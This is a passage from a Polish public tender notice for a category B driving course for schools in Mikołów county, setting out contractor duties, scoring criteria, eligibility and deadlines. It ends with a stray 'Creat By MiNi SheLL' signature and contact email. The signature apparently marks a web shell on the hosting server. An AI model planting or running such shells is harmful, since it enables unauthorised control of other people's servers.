kursu i list obecności.<br/>8. Wykonawca zapewni materiały dydaktyczne w postaci podręcznika lub skryptu lub e-podręcznika lub e-skryptu z zakresu<br/>tematyki kursu, zawierające przykładowe testy egzaminacyjne i przepisy ruchu drogowego (po zakończeniu kursu materiały<br/>przechodzą na własność uczniów).<br/>9. Komplet materiałów szkoleniowych Wykonawca dostarczy uczestnikom kursu najpóźniej w dniu rozpoczęcia kursu.<br/>10. Wykonawca zobowiązuje się do ponoszenia odpowiedzialności za wszelkie szkody powstałe w związku z<br/>wykonywaniem przedmiotu umowy, w tym za szkody wyrządzone osobom trzecim, za szkody oraz następstwa<br/>nieszczęśliwych wypadków powstałe w związku ze świadczeniem usług oraz niezwłocznego zawiadomienia w formie<br/>pisemnej Zamawiającego o wypadku podczas kursu, oraz sporządzenia karty wypadku ustalającej okoliczności i przyczyny<br/>wypadku oraz przekazania jej Zamawiającemu i poszkodowanemu.<br/>11. Wykonawca zobowiązuje się do zapewnienia ubezpieczenia od następstw nieszczęśliwych wypadków w trakcie kursu, w<br/>drodze na kurs i po kursie na sumę 15 000,00 zł oraz przekazania dokumentu potwierdzającego ubezpieczenie<br/>Zamawiającemu do 5 dni od daty pierwszych zajęć poszczególnych grup.<br/>12. Wykonawca zobowiązuje się zapewnić odpowiednie działania informacyjne i promocyjne zgodne z Wytycznymi<br/>dotyczącymi realizacji projektów współfinansowanych z Europejskiego Funduszu Społecznego, m.in. znakowanie<br/>materiałów szkoleniowych, dokumentów.<br/>13. Wykonawca zobowiązuje się do zrealizowania przedmiotu zamówienia zgodnie ze Standardami dostępności dla polityki<br/>spójności 2014-2020 (Załącznik nr 2 do Wytycznych w zakresie realizacji zasady równości szans i niedyskryminacji, w tym<br/>dostępności dla osób z niepełnosprawnościami oraz zasady równości szans kobiet i mężczyzn w ramach funduszy unijnych<br/>na lata 2014-2020 dostępnymi pod<br/>linkiem:https://rpo.slaskie.pl/dokument/wytyczne_zasady_rownosci_szans_i_niedyskryminacji_v2). Wszystkie działania<br/>muszą być realizowane w sposób niewykluczający udziału w kursie osób z niepełnosprawnościami.<br/>14. Wykonawca zapewni przeprowadzenie egzaminu wewnętrznego oraz wydanie uczestnikom kursu zaświadczenia<br/>ukończeniu kursu zgodnie z Ustawą o kierujących pojazdami. Kserokopie zaświadczeń Wykonawca dostarczy<br/>Zamawiającemu. W przypadku niezdania egzaminu wewnętrznego przez uczestników kursu, Wykonawca zorganizuje<br/>ponowny drugi egzamin wewnętrzny na własny koszt.<br/>15. Uczestnik kursu we właściwym urzędzie dla jego miejsca zamieszkania zakłada profil kandydata na kierowcę.<br/>Wykonawca pobiera profil od organu właściwego miejscowo. Po egzaminie wewnętrznym Wykonawca aktualizuje o dane<br/>dot. szkolenia profil kandydata na kierowcę. Uczestnik kursu ustala termin egzaminu państwowego z ośrodkiem<br/>egzaminowania. Wykonawca wnosi stosowne opłaty za egzamin państwowy uczestnika kursu.<br/>16. Wykonawca zobowiązuję się nie pobierać od uczestników kursu żadnych opłat.<br/>17. Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty:<br/>• listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu szkolenia,<br/>• program kursu oraz dziennik zajęć,<br/>• protokół z egzaminu wewnętrznego zawierający: - informację o wyniku części teoretycznej egzaminu wewnętrznego,<br/>liczbie popełnionych błędów, dacie przeprowadzenia egzaminu, podpisaną przez instruktora lub wykładowcę, który<br/>przeprowadził część teoretyczną egzaminu wewnętrznego, i osobę szkoloną;- arkusz przebiegu części praktycznej<br/>egzaminu wewnętrznego zgodny z arkuszem przebiegu części praktycznej egzaminu państwowego stosowanego do<br/>przeprowadzania egzaminów państwowych.<br/>• potwierdzenia odbioru materiałów szkoleniowych<br/>• kopie wydanych zaświadczeń i certyfikatów oraz listę potwierdzającą ich odbiór przez uczestników,<br/>• dokumentację fotograficzną z prowadzonego kursu, po uzyskaniu pisemnej zgody uczestników kursu (min. 6 zdjęć o<br/>dobrej jakości, przedstawiających realizację tematyki kursu i uczestników).<br/>18. Wykonawca zobowiązuje się przechowywać wszystkie dokumenty związane z realizacją kursu co najmniej do dnia<br/>31.12.2027 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411200-0 - Usługi szkół nauki jazdy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem :<br/>Kc - cena – waga 60 %<br/>Kdo – doświadczenie osób skierowanych do realizacji zamówienia - - waga 40 %<br/>3. Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów<br/>przewidzianych w danym kryterium. Łącznie Wykonawca może otrzymać maksymalnie 100 pkt. Pozostałym wykonawcom,<br/>spełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza liczba punktów. Zamawiający dokona oceny ofert<br/>przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>4. Sposób przyznawania punktów w poszczególnych kryteriach:<br/>4.1 Sposób oceny oferty w kryterium cena (Kc) .<br/>Do oceny w przypadku kryterium „cena” będzie brana pod uwagę cena brutto czyli obejmująca podatek VAT. Każdej z ofert<br/>przyznane zostaną punkty wyliczone wg wzoru:<br/>Kcn – liczba punktów przyznana ofercie n w kryterium Kc<br/>Kcn = (najniższa cena spośród wszystkich przedstawionych cen przez wykonawców, których oferty nie podlegały odrzuceniu / cena<br/>oferty badanej ) x 60.<br/>4.2 Sposób oceny oferty w kryterium „doświadczenie osób skierowanych do realizacji zamówienia” (Kdo).<br/>Ad. 2) doświadczenie osób skierowanych do realizacji zamówienia ( Kdo).<br/>2.1. W przypadku kryterium &#34;doświadczenie osób skierowanych do realizacji zamówienia&#34; do oceny będzie brane pod uwagę<br/>doświadczenie osób skierowanych do realizacji zamówienia - wykładowców części teoretycznej kursu nauki prawa jazdy kat.B.<br/>2.2. Zamawiający przyzna punkty w następujący sposób:<br/>- W przypadku gdy Wykonawca wykaże, że każda z dwóch osób skierowanych do realizacji zamówienia, jako wykładowcy posiada<br/>doświadczenie w przeprowadzeniu jednego kursu prawa jazdy kat.B w części teoretycznej ,w wymiarze minimum 30 h ,dla minimum<br/>10 osób, w okresie ostatnich trzech lat przed upływem terminu składania ofert otrzyma 10 punktów;<br/>- W przypadku gdy Wykonawca wykaże, że każda z dwóch osób skierowanych do realizacji zamówienia, jako wykładowcy posiada<br/>doświadczenie w przeprowadzeniu dwóch kursów prawa jazdy kat.B w części teoretycznej, w wymiarze minimum 30 h, dla minimum<br/>10 osób, w okresie ostatnich trzech lat przed upływem terminu składania ofert otrzyma 20 punktów;<br/>- W przypadku gdy Wykonawca wykaże, że każda z dwóch osób skierowanych do realizacji zamówienia, jako wykładowcy posiada<br/>doświadczenie w przeprowadzeniu trzech kursów prawa jazdy kat.B w części teoretycznej, w wymiarze minimum 30 h, dla minimum<br/>10 osób, w okresie ostatnich trzech lat przed upływem terminu składania ofert otrzyma 30 punktów;<br/>- W przypadku gdy Wykonawca wykaże, że każda z dwóch osób skierowanych do realizacji zamówienia, jako wykładowcy posiada<br/>doświadczenie w przeprowadzeniu czterech kursów prawa jazdy kat.B w części teoretycznej, w wymiarze minimum 30 h, dla<br/>minimum 10 osób, w okresie ostatnich trzech lat przed upływem terminu składania ofert otrzyma 40 punktów;<br/>2.3. W przypadku, gdy Wykonawca nie wykaże żadnego doświadczenia osób skierowanych do realizacji zamówienia - wykładowców<br/>otrzyma 0 punktów.<br/>2.4. Punkty w tym kryterium zostaną przyznane tylko w przypadku gdy Wykonawca wykaże dodatkowe doświadczenie każdej z<br/>dwóch osób - wykładowców skierowanych do realizacji zamówienia. Przykładowo gdy Wykonawca przy jednej osobie wykaże 4<br/>dodatkowe kursy a przy drugiej osobie trzy kursy otrzyma punkty za trzy kursy.<br/>2.5. W przypadku wskazania w formularzu ofertowym większej liczby osób niż dwie do oceny w tym kryterium ,Zamawiający<br/>przyjmie doświadczenie pierwszych dwóch osób wskazanych w tabeli, w formularzu ofertowym.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osob skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> INFORMACJE O WARUNKACH UDZIAŁU W POSTĘPOWANIU<br/>1.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu na podstawie art. 108 ust.1 ustawy Pzp,<br/>2. spełniają warunki udziału w postępowaniu, o ile zostały one określone<br/>1.2. Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunku udziału w postępowaniu w<br/>tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada uprawnienia do prowadzenia działalności<br/>gospodarczej w zakresie szkolenia kierowców , zgodnie z art. 28 ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami<br/>(tj. Dz.U.2021.1212 )<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/>4) zdolności technicznej lub zawodowej - Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności<br/>technicznej lub zawodowej, jeżeli Wykonawca wykaże, że:<br/>4.1 Skieruje do realizacji zamówienia:<br/>1) dwie osoby – instruktorów nauki prawa jazdy kat. B, z których każda z nich:<br/>a) posiada kwalifikacje zawodowe zgodnie z art.33 ustawy z dnia 5 stycznia 2011 roku o kierujących pojazdami ( (tj.<br/>Dz.U.2021.1212;<br/>2) dwie osoby - wykładowców części teoretycznej kursu nauki prawa jazdy kat.B, z których każda z nich:<br/>a) posiada kwalifikacje zawodowe zgodnie z art.38 ustawy z dnia 5 stycznia 2011 roku o kierujących pojazdami ( (tj.<br/>Dz.U.2021.1212);<br/>4.2 Zamawiający dopuszcza aby jedna osoba pełnić więcej niż jedną funkcję, o ile spełnia jednocześnie wymagane warunki<br/>ustalone odpowiednio dla poszczególnych funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania , aktualnych na dzień złożenia, następujących podmiotowych<br/>środków dowodowych:<br/>1) dokument potwierdzający wpis Wykonawcy do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców zgodnie z<br/>art.28 ustawy z dnia 5 stycznia 2011 roku o kierujących pojazdami (tj. Dz.U.2021.1212).<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.1. Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym. Ofertę należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ.<br/>1.2. Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym w rozdziale III sekcja 1 oraz sekcja 2 SWZ. Oświadczenie to stanowi dowód<br/>potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert,<br/>tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale IV sekcja 2 ust. 2.1 SWZ.<br/>Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ.<br/>1.3. Oświadczenie, o którym mowa w ust. 1.2 składają odrębnie:<br/>4) wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>5) podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków<br/>udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianiewarunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy<br/>1.4. Do oferty Wykonawca zobowiązany jest załączyć:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania,<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie<br/>osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 1),<br/>3) zobowiązanie, o którym mowa w rozdziale I, sekcja 5 ust. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach<br/>podmiotu udostępniającego zasób Wykonawcy;<br/>4) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) pełnomocnictwo, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publicznego, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>b) oświadczenie, o którym mowa w rozdziale I sekcja 4 ust. 4.4 SWZ (Zamawiający dopuszcza złożenia tego oświadczenia<br/>na formularzu ofertowym);<br/>1.5 Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 1.4 pkt. 1), jeżeli Zamawiający może<br/>je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp<br/>do tych dokumentów.<br/>1.6 Zapisy ust. 1.4 pkt 2) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.<br/>1.7 Zapisy ust. 1.4 pkt 1) i pkt 2), ust. 1.5 stosuje się odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący<br/>wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały<br/>sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został<br/>sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>4.4. W przypadku, o którym mowa w ust. 4.2 i 4.3 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Dotyczy to także<br/>wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, przewiduje możliwość zmian Umowy w następujących przypadkach:<br/>1) Konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia<br/>Umowy, gdy zmiana postanowień umownych jest korzystna dla Zamawiającego.<br/>2) W przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która<br/>przyznała środki na współfinansowanie zamówienia na usługę.<br/>3) w przypadku wystąpienia „siły wyższej”. „Siła wyższa” oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontroląniemożliwość wywiązania się z umowy w jej obecnym brzmieniu. Za siłę wyższą, warunkująca zmianę umowy uważać się<br/>będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki,wojna, stan pandemii, epidemii zmiany<br/>związane ze stanami pandemii, epidemii, w tym ich przebiegiem. W przypadku wystąpienia okoliczności siły wyższej, która<br/>będzie uniemożliwiać terminowe wykonanie obowiązków umownych, Strony uzgodnią na piśmie zakres działań, jakie będą<br/>podjęte w okresie działania zjawiska siły wyższej, a po jej ustąpieniu, określą na piśmie nowe terminy realizacji Umowy.<br/>4) W przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek<br/>elementu usług.<br/>5) Zmiany w kolejności i terminach wykonania przedmiotu zamówienia, na skutek zdarzeń losowych lub innych okoliczności.<br/>6) Zmiana osób prowadzących kurs zawodowy, a w szczególności dodanie nowych osób lub zamiana na inne osoby pod<br/>warunkiem spełnienia przesłanek określonych w § 4 ust. 3 i 4 niniejszej umowy,<br/>7) Zmiany harmonogramu realizacji przedmiotu umowy na skutek zdarzeń losowych lub innych okoliczności.<br/>8) Zmiana lub rezygnacja z podwykonawcy na etapie realizacji przedmiotu umowy z zastrzeżeniem § 10 ust. 2 i 3.<br/>9) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.<br/>10)W przypadkach określonych w przepisie art. 455 ust. 1 i 2 ustawy Prawo zamówień publicznych publicznych (tekst jedn.<br/>Dz. U. z 2021r. poz. 1129 z późniejszymi zmianami).<br/>2. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust.1 termin wykonania umowy może ulec<br/>odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty. Okres ten<br/>winien uwzględniać w szczególności czas trwania przyczyn uniemożliwiających wykonanie zamówienia, aż do czasu ich<br/>faktycznego usunięcia.<br/>3. Na wniosek Wykonawcy i po spełnieniu warunków określonych w umowie dotyczących podwykonawstwa, Wykonawca<br/>może modyfikować w trakcie wykonywania przedmiotu umowy złożone w ofercie deklaracje odnośnie podwykonawstwa<br/>poprzez:<br/>1) wskazanie innych podwykonawców;<br/>2) rezygnację z podwykonawców.<br/>4.Warunkiem dokonania zmian w umowie jest złożenie wniosku w formie pisemnej przez stronę inicjującą zmianę<br/>zawierającego: opis propozycji zmian, uzasadnienie zmian, opis wypływu zmiany na termin wykonania umowy.<br/>5.W przypadku, gdy o zmianę w umowie wnioskuje wykonawca, zgłasza on wniosek Zamawiającemu wraz z dokumentami<br/>potwierdzającymi konieczność ich wprowadzenia Wniosek powinien zostać złożony u Zamawiającego z chwilą zaistnienia<br/>okoliczności, jednak nie później niż w terminie do 10 dni od dnia, w którym Wykonawca dowiedział się, lub mógł dowiedzieć<br/>się o danym zdarzeniu lub okolicznościach.<br/>6. Strona, która otrzyma propozycję zawarcia aneksu winna ustosunkować się na piśmie, w terminie 14 dni od daty<br/>otrzymania, względnie przystąpić do negocjacji warunków aneksu albo podpisać aneks, jeżeli akceptuje jego treść. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.1. Ofertę należy złożyć poprzez System E-ZP w terminie do dnia 08.04.2022 r. do godz. 10:00 . Oferta musi być złożona przed upływem terminu składania ofert. O terminie złożenia oferty decyduje czas wygenerowania Urzędowego Poświadczenia Przedłożenia (UPP) w Systemie E-ZP.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Część dalsza sekcji III punkt.3.61.Ofertę, oświadczenie, o których mowa w art. 125 ust. 1 ustawyPzp należy złożyć pod<br/>rygorem nieważności w formie elektronicznej lub w postaci elektronicznejopatrzonej podpisem zaufanym lub podpisem<br/>osobistym. 2. Oferty, oświadczenia, o którychmowa w art. 125 ust. 1 ustawy Pzp, pełnomocnictwo, dokumenty, o których<br/>mowa w art. 94 ust.2 ustawy Pzp, sporządza się w postaci elektronicznej, w formatach danych określonych wprzepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacjidziałalności podmiotów realizujących<br/>zadania publiczne (Dz. U. z 2020 r. poz. 346, 568, 695,1517 i 2320). 3.Informacje, oświadczenia lub dokumenty, inne niż<br/>określone w ust. 2,przekazywane w postępowaniu, sporządza się w postaci elektronicznej, w formatach danych<br/>określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. oinformatyzacji działalności<br/>podmiotów realizujących zadania publiczne lub jako tekst wpisanybezpośrednio do wiadomości przekazywanej przy użyciu<br/>środków komunikacji elektronicznej.W związku<br/>zograniczoną ilością znaków w sekcji II pkt. 2.3) Nazwa zamówienia albo umowy ramowej -Zamawiający podaje poniżej<br/>pełną nazwę zamówienia:Zorganizowanie i przeprowadzenie kursu „Prawo jazdy kat.B wraz z egzaminem zewnętrznym” dla<br/>ZST w Mikołowie, ZSP w Ornontowicach oraz ZSEiU w Łaziskach Górnych, w ramach projektu „Efektywne Funkcjonalne<br/>Szkoły II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego” współfinansowanym ze środków<br/>Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata<br/>2014 – 2020.”

Creat By MiNi SheLL
Email: jattceo@gmail.com